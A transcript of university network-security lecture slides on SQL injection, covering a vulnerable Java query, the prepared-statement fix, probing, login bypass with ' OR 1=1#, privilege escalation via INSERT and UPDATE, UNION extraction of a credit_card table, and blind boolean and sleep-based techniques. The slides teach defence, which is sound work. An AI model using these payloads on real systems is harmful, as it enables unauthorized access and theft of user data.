webappsecurity: sql injectionexr/lectures/networksecurity/11_12/... · sql injection • input...
TRANSCRIPT
Today
• We have finished analyzing the security of
network protocols
• We will now focus on web applications and
their vulnerabilities (and attacks)
– SQL injection
Eike Ritter Network Security - Lecture 9 1
SQL injection
• Input validation vulnerability
• SQL queries are built using (unsanitized) data provided by the users
String q = "SELECT user, pwd FROM users ”+ "WHERE user= ‘" + request.getParameter("user") + ”’ ”;stmt.executeQuery(q);
• If the attacker provides as parameter special characters such as ‘ (tick), -- (comment), + (space), % (wildcard), it is possible to:– Modify queries in an unexpected way
– Probe the database
– Run commands (e.g., using xp_commandshell in MS SQL Server)
SQL injection
SQL Query
SELECT user, pwd FROM users WHERE user = ‘foo’
"SELECT user, pwd FROM users ”
+ "WHERE user= ‘" + request.getParameter("user") + ”’ ”;
foo
SQL injection
SQL Query
SELECT user, pwd FROM users WHERE user = ‘ ’ OR 1=1# ’
"SELECT user, pwd FROM users ”
+ "WHERE user= ‘" + request.getParameter("user") + ”’ ”;
‘ OR 1=1#
SQL injection
• The application is not vulnerable if it uses
prepared statements
authQuery = conn.prepareStatement(
“SELECT user, pwd FROM users WHERE user = ?”);
authQuery.setString(1, request.getParameter(“user”));
authQuery.executeQuery();
Eike Ritter Network Security - Lecture 9 8
Finding SQL injections
• Provide the application specially-crafted
values and check if they cause errors
– ‘
– “
– #
• Inject expression (typically a tautology) and
check if it is interpreted:
– user=‘ OR 1=1 #
Eike Ritter Network Security - Lecture 9 9
Exploiting SQL injections
• Take advantage of server’s error messages to
learn the structure of the database and its
tablesYou have an error in your SQL syntax; check
the manual that corresponds to your MySQL
server version for the right syntax to use
near '\'foo, user, pwd from users' at line 1
Exploiting SQL injections
• Take advantage of server’s error messages to
learn the structure of the database and its
tablesYou have an error in your SQL syntax; check
the manual that corresponds to your MySQL
server version for the right syntax to use
near '\'foo, user, pwd from users' at line 1
Exploiting different statement types
• INSERT INTO users (user, pwd,
privs) VALUES (‘foo’, ‘bar’, 1)
• Suppose user field is vulnerable
• Attacker submits:
foo’, ‘bar’, 0) #
• User foo is now registered with administrative
privileges (0)
Exploiting different statement types
• UPDATE users SET pwd = ‘newbar’
WHERE user = ‘foo’ AND pwd = ‘bar’
• Again, user field is vulnerable
• Attacker submits
admin’ #
• Attacker resets the admin’s password to a
string of his/her choice
Exploiting SQL injection – cont’d
• You identified a SQL injection in the SELECT query used in the login pageSELECT user, pwd FROM users WHERE user = ‘ + request.getParameter(“user”)
• Great, you can enumerate all the users and their passwords
• What if you are interested in the content of the credit_card table?
• UNION operator to the rescuefoo’ UNION SELECT cc_n, cc_name FROM credit_card
Exploiting SQL injection – cont’d
• Finding out more information about the database– Examples specific to MySQL (similar for other DBs)
– Examples may fail depending on the specific configuration of the DB
• List users of databaseselect distinct user from mysql.user
• List tables in databaseselect table_name, table_schema from information_schema.tables
• Get column name and type for a table in a given DBselect column_name, column_type from information_schema.columns where table_schema = ”mydb” and table_name = “users”
Eike Ritter Network Security - Lecture 9 15
Blind SQL injection
• Suppose error messages are disabled
– Unsure whether command is executed correctly
• How do we know if execution was successful?
• Technique:
– Conditional responses
• Special case: timing techniques
– Out-of-band channel
Eike Ritter Network Security - Lecture 9 16
Conditional responses
• We leverage the SQL injection to ask booleanquestions to the server– Questions that have a true/false answer
• Are we running as root?
• Is the first letter of the current database ‘a’?
• Technique– Establish baseline: determine what response is provided
by the application for a true question and for a false question
• “true page”: page returned for a true question
• “false page”: page returned for a false question
– Inject question
– Compare result with baseline• Did we obtain a true page or a false page
Eike Ritter Network Security - Lecture 9 17
Conditional responses
• Scenario:– Assume there is a SQL injection on product_id
parameter:/view?product_id=N
– True page“Details about product…”
– False page“No information about the product you searched”
• Injections:– product_id=42 AND user() = “root”
– product_id=42 AND substring(database(), 1, 1) = ‘a'
Eike Ritter Network Security - Lecture 9 18
Establishing the baseline
• Keywords – Search for keywords that appear in the true page only
and in the false page only
• MD5– Hash the resulting page
• HTML structure differences– Differences in the DOM tree structure
• Useful inputs to determine baseline– True question: 1=1
– False question: 1=0
Eike Ritter Network Security - Lecture 9 19
Time-based techniques
• Leverage time delays to infer execution status
• Often attacker can force query to take long time if certain condition is met
– waitfor (SQL Server)
– sleep (MySQL)
• Technique:
– Hypothesis: “we are running as root”
– Validation: issue a query that takes 5 seconds if the current user is actually root, else it terminates very quickly
Eike Ritter Network Security - Lecture 9 20
Time-based techniques (MySQL)
• Are we running as root?select if ( user() = "root", sleep(5), 1);
• Is the first letter of the user ‘a’?select if(substring(user(), 1, 1) = 'a', sleep(10), 2);1 row in set (0.00 sec)
• Is the first letter of the user ‘n’?select if(substring(user(), 1, 1) = 'n', sleep(10), 2);1 row in set (10.00 sec)
• How do we determine all the letters in the username?– 10 seconds per try
– Binary search, anyone?
Eike Ritter Network Security - Lecture 9 21
Take away point and next time
SQL injection
• Basic techniques
• More advanced techniques
– E.g., UNION queries
• Blind injection
– Conditional responses
– Time-based techniques
Next time
• More SQL injection
• Cross-site scripting
vulnerabilities (XSS)
• Cross-site request forgery
(CSRF)
Eike Ritter Network Security - Lecture 9 23
Read more
• C. Anley, (more) Advanced SQL injection
• K. Spett, Blind SQL Injection
• C. Hotchkies, Blind SQL Injection Automation
Techniques
• F. Mavituna, SQL Injection Cheat Sheet
• B. Damele and A. Guimaraes, Advanced SQL
injection to operating system full control
Eike Ritter Network Security - Lecture 9 24